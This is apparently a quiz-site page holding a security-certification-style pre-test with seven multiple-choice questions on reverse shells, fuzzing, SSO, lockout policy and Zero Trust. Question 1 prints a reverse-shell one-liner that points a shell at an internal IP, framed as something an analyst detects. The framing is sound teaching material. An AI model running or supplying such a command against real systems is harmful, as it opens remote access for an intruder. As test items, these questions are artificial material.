Pre Test

Pre Test

Professional Development

10 Qs

quiz-placeholder

Similar activities

UNLOCK THE FUTURE WITH AI SKILLS

UNLOCK THE FUTURE WITH AI SKILLS

Professional Development

10 Qs

VERY VERY HARD TECH QUIZ

VERY VERY HARD TECH QUIZ

Professional Development

10 Qs

Final Quiz AI Impact in HR

Final Quiz AI Impact in HR

Professional Development

10 Qs

SHS Faculty Library Orientation SY 24-25

SHS Faculty Library Orientation SY 24-25

Professional Development

10 Qs

Office 365 & Microsoft Teams Quiz

Office 365 & Microsoft Teams Quiz

Professional Development

10 Qs

Chuyển đổi số và ứng dụng CNTT trong Giáo dục

Chuyển đổi số và ứng dụng CNTT trong Giáo dục

Professional Development

15 Qs

Quiz Webinar #21: Blockchain, Block the Chain?

Quiz Webinar #21: Blockchain, Block the Chain?

Professional Development

10 Qs

Quiz - Sharing Session SMB Technical

Quiz - Sharing Session SMB Technical

Professional Development

10 Qs

Pre Test

Pre Test

Assessment

Quiz

Information Technology (IT)

Professional Development

Practice Problem

Medium

Created by

Catur Riyono

Used 3+ times

FREE Resource

AI

Enhance your content in a minute

Add similar questions
Adjust reading levels
Convert to real-world scenario
Translate activity
More...

10 questions

Show all answers

1.

MULTIPLE CHOICE QUESTION

1 min • 1 pt

A security analyst detects an exploit attempt containing the following command: sh -i >& /dev/udp/10.1.1.1/4821 0>$l Which of the following is being attempted?

RCE

Reverse shell

XSS

SQL injection

2.

MULTIPLE CHOICE QUESTION

45 sec • 1 pt

A security analyst would like to integrate two different SaaS-based security toots so that one tool can notify the other in the event a threat is detected. Which of the following should the analyst utilize to best accomplish this goal?

SMB share

API endpoint

SMTP notification

SNMP trap

3.

MULTIPLE CHOICE QUESTION

45 sec • 1 pt

A company is launching a new application in its internal network, where internal customers can communicate with the service desk. The security team needs to ensure the application will be able to handle unexpected strings with anomalous formats without crashing. Which of the following processes is the most applicable for testing the application to find how it would behave in such a situation?

Fuzzing

Coding review

Debugging

Static analysis

4.

MULTIPLE CHOICE QUESTION

45 sec • 1 pt

An analyst is suddenly unable to enrich data from the firewall. However, the other open intelligence feeds continue to work. Which of the following is the most likely reason in the firewall feed stopped working?

The firewall service account was locked out.

The firewall was using a paid feed.

The firewall certificate expired.

The firewall failed open.

5.

MULTIPLE CHOICE QUESTION

45 sec • 1 pt

A security administrator has found indications of dictionary attacks against the company’s external-facing portal. Which of the following should be implemented to best mitigate the password attacks?

Multifactor authentication

Password complexity

Web application firewall

Lockout policy

6.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Which of the following would eliminate the need for different passwords for a variety of internal applications?

CASB

SSO

PAM

MFA

7.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Which of the following features is a key component of Zero Trust architecture?

Single strong source of user identity

Implementation of IT governance

Business continuity plan

Quality assurance

Internal auditing process

Create a free account and access millions of resources

Create resources

Host any resource

Get auto-graded reports

Google

Continue with Google

Email

Continue with Email

Classlink

Continue with Classlink

Clever

Continue with Clever

or continue with

Microsoft

Microsoft

Apple

Apple

Others

Others

Already have an account?